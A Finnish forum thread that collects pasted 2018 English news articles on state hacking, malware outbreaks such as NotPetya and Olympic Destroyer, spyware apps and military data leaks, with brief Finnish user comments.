Cyber-ketju: verkkovakoilu,kännyköiden ja wlanien seuranta, hakkerointi, virukset, DoS etc

  • Viestiketjun aloittaja Viestiketjun aloittaja OldSkool
  • Aloitus PVM Aloitus PVM
Now, however, the group is targeting financial organizations in Russia, and, of concern, biological and chemical threat prevention laboratories in Europe and Ukraine.

New Victim Profiles

Kaspersky Lab researchers examined some of the phishing lures to find out more about the targets, based on decoy documents, email subjects and file names. For instance, two of the decoy documents reference the Salisbury poison attack on Russian double agent Sergey Skripal and his daughter in London earlier this year.

One of the documents observed in the attacks references the nerve agent used to poison them; another references Spiez Convergence, a biochemical threat research conference held in Switzerland. The sponsor, Spiez Laboratory, was involved in the Skripal attack investigation.

“Further analysis of other related files suggests that the target of [yet another] document is working in the biological and epizootic threat prevention field,” Kaspersky researchers said in a post published Tuesday.

The lures also suggest that they were “probably prepared with the help of a native [Russian] speaker and not automated translation software,” researchers noted. For instance, one of the documents included a lure image with perfect Russian language in it, and the Cyrillic messages inside this and previous documents are in perfect Russian.

There are ties to the Ukraine too. For instance, once the user enables the macro, a decoy document is displayed, taken very recently from the official website of the Ukrainian Ministry of Health.

These could all be red herrings however – during the Pyeongchang attacks, Olympic Destroyer planted several false flags meant to confuse and misdirect attribution efforts. Various aspects were calculated to make the threat actor look like the Lazarus APT, which is widely believed to be associated with North Korea.

All of this makes it difficult to determine whoever is behind the latest Olympic Destroyer attacks.

“The variety of financial and non-financial targets could indicate that the same malware was used by several groups with different interests – i.e., a group primarily interested in financial gain through cybertheft and another group or groups looking for espionage targets,” researchers noted. “This could also be a result of cyberattack outsourcing, which is not uncommon among nation-state actors. On the other hand, the financial targets might be another false flag operation by an actor who has already exceled at this.”

Kaspersky Lab said that various TTPs could point to the Sofacy/Fancy Bear APT, a well-known Russian-speaking gang, but that it can only assess this with “low-to-moderate confidence.”

A Sophisticated Actor

In any event, this shadowy group behind the attacks uses a sophisticated level of expertise when it comes to the kill chain. The infection procedure relies on multiple different technologies, mixing VBA code, Powershell and MS HTA, with JScript– and is unique enough to act as further evidence for a relationship with the Olympic’s attack.

It starts with an embedded malicious macro in the spear-phishing document that is heavily obfuscated, the researchers noted, with a randomly-generated variable and function name. Its purpose is to execute a Powershell command.

“This VBA code was obfuscated with the same technique used in the original Olympic Destroyer spear-phishing campaign,” the researchers said. “The obfuscator is using array-based rearranging to mutate original code, and protects all commands and strings, such as the command and control (C2) server address. There is one known obfuscation tool used to produce such an effect: Invoke-Obfuscation.”

This Powershell script also disables logging in order to avoid leaving traces, and it goes on to decrypt additional payloads downloaded from Microsoft OneDrive. The decryption relies on a hardcoded 32-byte ASCII hexadecimal alphabet key – another technique used in the Olympics attack.

After another round of Powershell scripting and decrypting, the final payload is the Powershell Empire agent, which allows fileless control of the compromised hosts for lateral movement and information-gathering.

Spy Today, Destroy Tomorrow

The fact that the payload is a cyberespionage tool suggests that the actors are in a reconnaissance phase. Unfortunately, this could be a prelude to something much worse, if past is prologue.

“Olympic Destroyer was a cyber-sabotage attack based on the spread of a destructive network worm,” the researchers said. “The sabotage stage was preceded by reconnaissance and infiltration into target networks to select the best launchpad for the self-replicating and self-modifying destructive malware.”

That larger cyber-sabotage stage was meant to “destroy and paralyze infrastructure of the Winter Olympic Games, as well as related supply chains, partners and even venues at the event location.” It’s possible that the same pattern will play out here.

Kaspersky Lab is advising all bio-chemical threat prevention and research companies and organizations in Europe to strengthen their security and run unscheduled security audits.

“It’s no surprise that the actors behind successful cyberattacks that disrupted the Pyeongchang Olympics are now targeting other organizations,” said Aaron Higbee, CTO and co-founder of Cofense (formerly PhishMe), via email. “Regardless of the sector being targeted, phishing is a serious threat because it works, often making their way past stacks of expensive technology layers and email gateways to land in an unsuspecting user’s inbox. In this case, it appears that the attackers are likely using spear-phishing emails that look like they’re coming from a trusted source, a tactic our research has shown to be particularly successful.”

https://threatpost.com/olympic-destroyer-returns-to-target-biochemical-labs/132929/
 

Iippojen Unit 8200 wardriving paku stereoideilla. 500m on propagandaa. Todellinen etäisyys on hyvin luultavasti kymmeniä kilometrejä, ellei enemmän.

Sometimes it’s hard to tell if something is real or was dreamed up by a Batman villain. That’s the case with the WiSpear iPhone hacking van.

This tool supposedly can be used to install malware on an iOS or Android device from a third of a mile away.

WiSpear allegedly forces an iPhone to connect to its Wi-Fi access point. Then it uses man-in-the-middle attacks to snoop on the data being transferred to and from the iOS device. The company behind this hacking tool on wheels says it can install also malware on the device, according to Forbes.

Multiple computers can be attacked at once from the WiSpear. Allegedly, a users’ iPhone and Mac can be hacked simultaneously. Not to be left out, the hacking tool also works on Android-based phones.
https://www.cultofmac.com/557663/wispear-hacks-iphones-500m-away/
 
Iippojen Unit 8200 wardriving paku stereoideilla. 500m on propagandaa. Todellinen etäisyys on hyvin luultavasti kymmeniä kilometrejä, ellei enemmän.

https://www.cultofmac.com/557663/wispear-hacks-iphones-500m-away/
Nyt sitten enemmän realismia ja vähemmän ihmisten pelottelua mukaan.

Jos tuo toimii niinkuin väitetään eli pakottaa puhelimen irtoamaan nykyisestä wifistä ja kytkeytyy tuon auton wifiin, voin suoraan sanoa ettet hakkeroi mitään puhelimia edes parin sadan metrin päästä. Ihan vaan johtuen siitä, että puhelinten wifi-antennit ovat pienet ja lähetysteho rajattu. Muutenkin aika kovaa uhota, että pystyy pudottamaan malware iPhone ja Android puhelimiin, tämä vaatisia useamman nollapäivä-haavoittuvuuden olevan tuon lafkan tiedossa. Voi toki olla, mutta yleensä niistä ei huudella hirveästi.
 
tämä vaatisia useamman nollapäivä-haavoittuvuuden olevan tuon lafkan tiedossa.

Wardriving ei tarvitse nollapäivä haavoittuvuuksia. Metodit ja konstit avaimien keräämiseen on tiedossa ja löytyy helposti vaikka Kali linuxin pentestin kirjastoista. Vakoilu on tuossa pakussa pääsijainen tehtävä, ei malwaren tiputus.
 
Today (27 June) marks the first anniversary since the NotPetya ransomware ravaged a range of businesses from shipping ports and supermarkets to ad agencies and law firms.


Once in a system, the code sought to encrypt files and destroyed master boot records, leaving infected Windows machines useless. The malware spread using the US National Security Agency's leaked EternalBlue exploit, which was also abused by WannaCry months earlier.


Updates of MeDoc, Ukraine's most popular accounting software, covertly tainted with NotPetya by hackers, distributed the ransomware payload. Once installed, the backdoored code spread like wildfire across flat networks, scrambling files as it went. The effects were devastating. Western intel agencies subsequently blamed Russia for the attack.


Most victims were based in Ukraine, but several global corporations were also infected – including shipping giant Maersk, advertising firm WPP, pharmaceutical outfit Merck, and FedEx's TNT Express division.


FedEx estimated that NotPetya cost it $300m in lost business and cleanup. Maersk also said it was out of pocket by the same amount as a result of the outbreak. Reckitt Benckiser – the firm behind the Dettol and Durex brands – said the attack cost it £100m ($136m). Other victims included Russian oil company Rosneft and multinational law firm DLA Piper.


Mikko Hypponen, chief research officer at Finnish infosec firm F-Secure, told El Reg: "I believe that NotPetya was the single most expensive computer security incident in history. I believe it created bigger losses than any malware outbreak ever, or any hacking incident ever, or any data leak ever. It was historic."


NCC Group rebuilt the malware without the destructive element to test what a real-life attack would look like on an organisation's infrastructure. The exercise showed how quickly malware of this type was capable of spreading across poorly segmented networks.


BlackBerry CTO Charles Eagan reckoned organisations have still not learnt from the mistakes WannaCry and NotPetya exposed.


"Just weeks after WannaCry crippled the NHS and broader industries, NotPetya hit," Eagan said. "One year on from NotPetya, it seems lessons still haven't been learned.


"A lack of regular patching of outdated systems because of the issues of downtime and disruption to organisations was the path through which both NotPetya and WannaCry spread, and this fundamental problem remains."
https://www.theregister.co.uk/2018/06/27/notpetya_anniversary/
 
Lithuania's proposal that the European Union create an international cyber-force has been endorsed, and the effort already has seven countries on board.

The baltic country announced yesterday that EU member states have agreed to create “EU Cyber Rapid Response Force” teams, with a declaration of intent signed in Luxembourg yesterday by the EU Foreign Affairs Council.

Minister of National Defence Raimundas Karoblis said international efforts are needed because of the cross-border nature of modern infosec threats (except, of course, he said “cyber”).

As well as Lithuania, which leads the project, participants currently include Croatia, Estonia, France, Finland, the Netherlands, Romania, and Spain. Belgium, Germany, Greece, and Slovenia are observers, and another four countries are expected to sign on by the end of the year.

Karoblis said to take part, countries will need an existing “standing cyber security unit” able to help investigate serious incidents.

In the first phase of the project, participating countries will assess the technical and legal basis of the cyber team operations, and wrangle about project financing.

The second phase, the announcement said, will involve joint exercises, and assess the prospects that members could create mutual cyber defence tools.
https://www.theregister.co.uk/2018/06/27/eu_cyber_force/
 

US security company FireEye has denied a claim aired in a new book that it hacked into laptops owned by Chinese military hackers.

It's common knowledge that prior to its acquisition by FireEye, the security concern Mandiant brought the Chinese operation known as APT1 undone. In its 2013 report, the company attributed espionage against 141 companies in 20 industries to APT in attacks dating back to 2006.

Its report said APT1 operated closely to People's Liberation Army Unit 61398, and had similar “mission, capabilities, and resources”.

In 2015, responding to many requests from the USA, China arrested a number of hackers over the campaigns.

Mandiant's kept its methods secret, and that left room for David Sanger, a New York Times correspondent, to make the sensational claim that it was a “hack-back” operation that included spying on the Chinese hackers via Webcams in their compromised laptops. The allegation appears in his new book, The Perfect Weapon.

Not so, says FireEye. The company's refutation, published here, said “hack-back” techniques weren't used in Mandiant's exposure of APT1.
https://www.theregister.co.uk/2018/06/27/fireeye_we_didnt_hack_back_against_apt1/
 
Kait tämäkin pitää laskea sitten valtiollisen toiminnaksi. ROFL.

has accused its enemy Hamas of building fake dating apps to woo soldiers into downloading malicious software on to their mobile phones.

Hundreds of Israel Defence Forces (IDF) troops were contacted via social media this year and asked to download one of two fake dating apps, WinkChat and GlanceLove, according to an official in the army’s intelligence directorate.

Once the bogus app was installed, it granted its creators the ability to see the owner’s location and contact list and to use the phone as a listening device and video camera.

“Whatever you can do with your phone, the malicious content can do,” the official said at a briefing to journalists on Tuesday, adding the operation targeted Android phones.

The soldiers were contacted via phony Facebook accounts, often with the stolen identities of young women, asking to chat on WhatsApp. They were then sent links to the apps, which were listed on the Google Play store and have since been removed.

He said a third sham app, Golden Cup, promoted as a World Cup live scores and fixtures aid, was advertised to soldiers in Hebrew on Facebook. The app streamed videos of impressive goals from previous tournaments and listed details about each team. “It was actually a very good one,” the official said.

The IDF said the hacks had failed to cause any “security damage at all” and said most soldiers and others working for the army who were approached to download the app had refused and reported the incident to their commanders.

However, it conceded that some soldiers had downloaded the apps. While it did not provide an exact figure, the military said “less than 100” installed at least one program on their phones.

The IDF, which had been monitoring the hack for months, called its operation Broken Heart as it claimed the honeytrap had failed to seduce its soldiers effectively. It said both serving men and women were targeted.

Hamas attempted a similar strategy in January 2017 but used less advanced apps sold as social chat platforms, according to the military.

As part of a new awareness programme to protect its secrets, the IDF has started to send its own fake messages to soldiers that asks them to click on a link. If the soldier opens the link, a warning pops up and they have to meet their commanding officers to debrief on online security.

An official for Hamas, the Palestinian militant and political faction that runs the Gaza Strip, declined to comment.
https://www.theguardian.com/world/2...ated-fake-dating-apps-to-hack-soldiers-phones
 
The Air Force issued a formal proposal earlier this month for the Department of Defense’s long-awaited cyber weapon system, known as the Unified Platform, sources tell Fifth Domain.

DoD officials have said the Unified Platform is one of U.S. Cyber Command’s largest and most critical acquisition programs to date. Industry officials have said it is necessary to conduct cyber operations and is critical to national security.
https://www.fifthdomain.com/dod/cyb...r-command-moves-closer-to-a-major-new-weapon/

But details on what the Air Force, which issued the request on behalf of Cyber Command, wants in a Unified Platform are scarce.

Sources told Fifth Domain a formal request for proposal was released through the General Services Administration’s premier enterprise Alliant Governmentwide Acquisition Contract vehicle, which “provides flexible access to customized IT solutions from a large, diverse pool of industry partners … [and] allows for long-term planning of large-scale program requirements.”

Under this model, GSA completes much of the initial contracting legwork and, in this case, allows the Air Force to focus on the specific technical requirements, sources said. Companies compete to be eligible for task orders under the Alliant contract and then GSA selects contractors who compete against each other for individual task orders on the final program. This means, only vetted companies would work on the program.

Alliant is also designed to streamline contracts for IT projects only, eschewing some of the documentation and financials in typical contracts enabling faster awards.

The Unified Platform proposal was only released to companies on the contract about two weeks ago, sources said, and is due in mid-July.

Today, each of the individual services use their own disparate systems, many of which are not linked together. The spokesman added that efforts are underway to review and consolidate existing service and Cyber Command’s platforms.

Unified Platform seeks to take the best of breed of these and provide all cyber warriors a consolidated system.

“In concert with US Cyber Command and all Services, the Air Force as Executive Agent is directing development and deployment to ensure timely and relevant full-spectrum capabilities for our cyber warriors,” an Air Force spokeswoman said.

An Air Force spokeswoman said that the Air Force’s Life Cycle Management Center will serve as the system integrator and will lead a multi-contractor, agile development/operations effort to launch and expand the Unified Platform.

Currently, Lockheed Martin, Northrop Grumman, Raytheon and Booz Allen Hamilton are known to be competing for the contract. Sources said other companies may also be considering a bid.
 
Näin hybridihöpinöistä kiinnostuneena ja kirjoittelevana on pakko ihmetellä ääneen, että mikähän siinä on, että monet tietokoneen toiminnot ovat hidastuneet noin sadasosaan totutusta ja vanhimman lapsen kännykän virrankulutukseen tuli muutama päivä sitten aivan järkyttävä muutos. Jokin ahmaisi muutamassa tunnissa puolillaan olevan akun tyhjäksi.

Ja kaikenlaista muutakin viestiliikennelaitteiden kummallisuutta on milloin enemmän ja milloin vähemmän. Useimmiten enemmän.
 
Jokin ahmaisi muutamassa tunnissa puolillaan olevan akun tyhjäksi.

Itse sisältöä tutkimatta vaikea sanoa. Hyökkäys ei välittämättä näy missään virtapiikkina, mutta bruteforce hyökkäys on toinen asia. Uskon enemmin että taustalla pöyri useampi softa samaan aikaan, ja moniajo söi akun tyhjäksi.

että monet tietokoneen toiminnot ovat hidastuneet noin sadasosaan totutusta

Sulla on mato tai joku muu vastaava saastuttamassa. Yhtä-äkkinen hidastuminen ja kokonaisvaltainen tahmaus on aina merkki siitä että käyttäjälle ei jää prosessori aikaa ja täten tuo näkyy tahmauksena. Toisin sanoen joku toinen omistaa koneesi ja pahimmassa tapauksessa käyttää sitä louhimaan bitcoin valuuttaa sun jäädessä laskunmaksajaksi. Mutta kyse voi olla monesta muusta asiasta mitä pitäisi ihmetellä.
 
Privacy is going to be the most critical topic for technology for the next 10, 20 or even 30 years.


Because of the ubiquity of the internet and devices like our smart phones and, of course, the enormous amounts of money that companies like Google and Facebook have figured out how to make from selling our personal information, it is increasingly easy and profitable to infringe on previous privacy norms.


If the Supreme Court continues down its current path – imposing and expanding controls over what tech can do – it will slowly throttle the commercialization of private data. And that will have big knock-on impacts on the tech industry and broader society. But if the court starts moving down a more free-market route, that could all change.



Kethledge was a member of the court that decided that cell phone data on a third party's servers is not covered by the Fourth Amendment – a decision that the Supreme Court overturned last month in its Carpenter decision (which was 5-4).

He wrote: "The Supreme Court has long recognized a distinction between the content of a communication and the information necessary to convey it." That is a viewpoint that will have privacy advocates worried.

Kavanaugh is a reliably pro-corporate judge and so while he appears not to have addressed privacy issues head on, you can expect him to see the value in the dollar over the principle i.e. bye-bye privacy.

Again, the likely positions of Hardiman and Barrett are very hard to infer based on the decisions that have made. It's worth noting that Hardiman tends to have more of a heart, something that likely comes from his background – he was the first in his family to attend college and he worked as a cab driver to pay his way through law school.

Barrett is cold by comparison, actively arguing that a judge's personal views should not impact their decisions – although that may itself have been because she was being criticized for her strong Catholic beliefs (it's all about abortion in America).

When it comes to privacy issues, the arguments for it are likely to depend on people recognizing the impact that it can have on individuals, particularly the most vulnerable in society. So, if we were to hazard a wild guess, Hardiman would be pro-privacy and Barrett pro-corporate and hence anti-privacy.


To sum up: things don't look good if you think privacy should trump corporate profits.

Spying

The enormous upheavals that were sparked by Edward Snowden's revelations of mass surveillance have died down. After all, Congress scaled some back and reapproved some others.

But we have a niggling suspicion that spying on individuals is going to crop up again in the next decade or so, especially given the entirely unsettled issue of encryption backdoors and access to information.

Congress is absolutely terrified of this issue because it's like being stuck between a rock and a hard place – the security services on one side and voters on the other.

The intelligence services do everything in their power to keep the issue of mass surveillance and spying out of the limelight but with so many issues still unresolved it is very possible it will need additional legal clarification, and that in turn would ultimately mean the Supreme Court weighing in.

Kavanaugh is the person with the most history in this context and he is firmly pro-NSA, even writing an effusive defense of its mass surveillance programs. "The government's metadata collection program is entirely consistent with the Fourth Amendment," he wrote, adding that: "Critical national security need outweighs the impact on privacy."

Since any challenge to spying program is likely to focus on the Fourth Amendment then Kethledge's view that cell phone data held on third-party servers was not covered by it also points to a pro-NSA position.

Hardiman is, again, the most likely to push back against government spying. He backed a lawsuit that took issue with the NSA's surveillance programs and claimed that someone's personal docs held online may had been wrongly swept up by the spy agency.

And it's hard to know where Barrett stands. She tends to stand with the current authorities' viewpoint but also makes noises about challenging old laws. Our guess would be that she will go with whatever the security services insist is true.

The upshot: only Hardiman is likely to stand up to government spying programs if they make their way to the Supreme Court.
https://www.theregister.co.uk/2018/07/09/supreme_court_justice/
 
The number of organisations affected by cryptomining malware in the first half of 2018 ramped up to 42 per cent, compared to 20.5 per cent in the second half of 2017, according to a new report from Check Point.

The top three most common malware variants seen in the first half of 2018 were all cryptominers: Coinhive (25 per cent); Cryptoloot (18 per cent); and JSEcoin (14 per cent). All three perform online mining of the cryptocurrency – often without a user's knowledge, much less consent – when a surfer visits a web page that harbours cryptomining code.

Locky was the leading ransomware variant hitting organisations globally in the first six months of 2018, ahead of WannaCry and Globeimposter. Locky spreads mainly via spam emails containing a downloader, disguised as a Word or Zip attachment. WannaCry used a Windows SMB exploit called EternalBlue to spread while Globeimposter is distributed by spam campaigns, malvertising and exploit kits.

Cloud infrastructures appeared to be a growing target among hackers during the first six months of this year. Check Point further noted an increase in the number of malware variants targeting multiple platforms (mobile, cloud, desktop etc).

"Up until the end of 2017, multi-platform malware was witnessed in only a handful of occasions," the security researchers said, "but, as predicted, the rise in the number of consumer-connected devices and the growing market share of operating systems which are not Windows has led to an increase in cross-platform malware. Campaign operators implement various techniques in order to take control over the campaigns' different infected platforms."

There were several incidences of mobile malware that originated from the supply chain. Infected devices are being sold to consumers so that new Android smartphones come pre-pwned with malicious code. Mobile malware is increasingly disguised as genuine applications on app stores. These nasties include banking trojans, adware and sophisticated remote access trojans (RATs), Check Point added.

Check Point's Cyber Attack Trends: 2018 Mid-Year Report is based on threat data collected between January and June 2018. ®
https://www.theregister.co.uk/2018/07/12/malware_sitrep/

En usko että tämä #MiningWar menee pois lähiaikoina, enkä myöskään usko että olemme nähneet vielä kaikkein rajuimpia tempauksia. #Wardriving, #RainbowTables #Phishing #MalWaretus on niin eilistä päivää, mutta ne on kaikki adaptoitu tämän päivän operaatioihin.
 
On June 1, Recorded Future’s Insikt Group was monitoring underground criminal activity when it identified a newly registered member of a hacking forum, attempting to sell highly sensitive documents about the U.S. military MQ-9 Reaper drone. Given that it’s incredibly rare for criminal hackers to attempt to sell military documents on an open market, the firm looked into the offering further. It was able to contact the hacker and verify the veracity of the documents, opening up a further dialog with the perpetrator.

In doing so, it uncovered the actor’s tactics: He or she exploited vulnerable Netgear routers with improperly setup FTP login credentials to gain access to an unidentified officer’s information.
In an analysis of the hack published Tuesday, Recorded Future said that the bad actor used the Shodan search engine to scan large segments of the internet for Netgear DGN2200v4 modem routers with weak passwords that use a standard, open port 21. From there, thanks to a command execution and FTP insecure root directory security vulnerability, hackers who have an unpatched router’s administrative password can inject OS commands that can be used to backdoor the router. They can then use that access to intercept network traffic flowing through it, including file attachments.

It’s a sadly all-too-common opening: Despite it being two years since the Netgear vulnerability was first acknowledged, the problem remains widespread, the firm said. During recent research, Recorded Future identified more than 4,000 routers susceptible to the attack.

Recorded Future went on to say that the hacker used this tactic to infiltrate the computer of a captain at 432d Aircraft Maintenance Squadron Reaper AMU OIC, stationed at the Creech AFB in Nevada. There, he or she “stole a cache of sensitive documents, including Reaper maintenance course books and the list of airmen assigned to Reaper AMU,” the form noted. It added, “While such course books are not classified materials on their own, in unfriendly hands, they could provide an adversary the ability to assess technical capabilities and weaknesses in one of the most technologically advanced aircrafts.”

Aside from the drone information, the actor also revealed that he or she is in possession of a second dataset, including “the M1 Abrams maintenance manual, a tank platoon training course, a crew survival course and documentation on improvised explosive device (IED) mitigation tactics,” according to Recorded Future. While the source isn’t known, these appear to be stolen from the Pentagon or from a U.S. Army official, the firm said.

“The fact that a single hacker with moderate technical skills was able to identify several vulnerable military targets and exfiltrate highly sensitive information in a week’s time is a disturbing preview of what a more determined and organized group with superior technical and financial resources could achieve,” Recorded Future said.

The exfiltration of such sensitive military secrets is not as uncommon as one would hope. This latest news comes on the heels of a revelation last month that an unidentified hacker trying to sell purported U.S. military documents containing submarine warfare information. The stolen data included “secret plans to develop a supersonic anti-ship missile for use on U.S. submarines by 2020,” American officials said.

“Modern warfare is inherently dependent upon computing, from drones, to missiles, to communications with troops on the ground,” said Tom Kellermann, chief cybersecurity officer at Carbon Black, via email. “Nation-states like China, Russia, Iran and Syria are escalating their cyberattacks against U.S. personnel through cyberspace. This breach represents an ominous trend of unmasking those who man the tip of America’s spear – drone pilots of the U.S. Air Force. The DoD must modernize its cybersecurity posture given the rapid evolution and coordination of enemies in cyberspace.”

Aside from illustrating a pervasive problem in the level of government security hygiene, this latest incident also points out potentially poor judgement on a more individual level.

“Does the USAF use Wi-Fi connected to their NIPRNet?/ DoDIN? I have to believe the answer is a definitive no. As such, it may have been the case someone had the documents on an off-premise device connected to a home or other open Wi-Fi network,” Sherban Naum, senior vice president of corporate strategy and technology at Bromium, told Threatpost via email. “The idea that it was a two-year-old vulnerability and not patched tells me it may have been a personal Wi-Fi access point left unmanaged/unpatched.”

While preventing unauthorized data movement and extraction is a challenge for the DoD, simply due to the vast number of users, contractors and programs at play, there are some best practices to follow, Naum added. For one, the main mitigation for the Netgear hack is simple: Changing the router’s administrative password.

Also, “high-value asset (HVA) consolidation is a key movement within the DoD, with Ron Ross at NIST leading the discussions,” he explained. “By securing DoD HVAs, they can then focus on connections into the HVA, limiting access and attesting both the device and user prior to allowing them onto the HVA fabric. By limiting access to and controlling data flow from the HVA to the user’s local device, the DoD can limit the amount of data loss.”
https://threatpost.com/hacker-compromises-air-force-captain-to-steal-sensitive-drone-info/133915/
 
Researchers have claimed the infamous APT28 Kremlin-linked hacking group was behind a new cyber-espionage campaign they believe was targeted at the Italian military.


Security researchers from the Z-Lab at CSE Cybsec spent the weekend unpicking a new malware-base cyber-espionage campaign allegedly conducted by APT28 (AKA Fancy Bear).


The multi-stage campaign features an initial dropper malware, written in Delphi, and a new version of the X-agent backdoor, a strain of malicious code previously linked to APT28.


One malicious library (dll) file associated with the campaign phones home to a command-and-control server with the name “marina-info.net”. This is a reference to the Italian Military corp, Marina Militare, according to the researchers.


"The dll that connect to 'marina-info.net' might be the last stage-malware that is triggered only when particular conditions occur, for example when the malware infects a system with an IP address belonging to specific ranges," claimed to the researchers.


The Russian state-backed hackers may be targeting specific organisations including the Italian Marina Militare and its subcontractors, the researchers conclude. The targeting of Italian organisations during the summertime led the researchers to nickname the campaign "Roman Holiday".


Researchers from Z-Lab worked with independent researcher Drunk Binary (@DrunkBinary) on malware samples spotted in the wild and uploaded them to VirusTotal as they put together their analysis.


Further details on the malware samples analysed by CSE Cybsec, including the indications of compromise, are available in a report published by researchers at ZLAb here (pdf).


https://www.theregister.co.uk/2018/07/16/apt28_italian_job/
 
Kiinnittikö kukaan huomiota rumpin & puten vierailun aikana kiukutteleviin kännykän ja wlanin toimintoihin. Olin tuolloin Kuusamon huudeilla ja yhteydet välillä erittäin epävakaat.
 
Kiinnittikö kukaan huomiota rumpin & puten vierailun aikana kiukutteleviin kännykän ja wlanin toimintoihin. Olin tuolloin Kuusamon huudeilla ja yhteydet välillä erittäin epävakaat.
Tuohon riittää helle. Lämmin ilma + korkea suhteellinen kosteus, niin wlan blokkautuu osaksi. Korkeat lämpötilat vaikuttavat myös G3/4 yhteyksiin.
 
Back
Top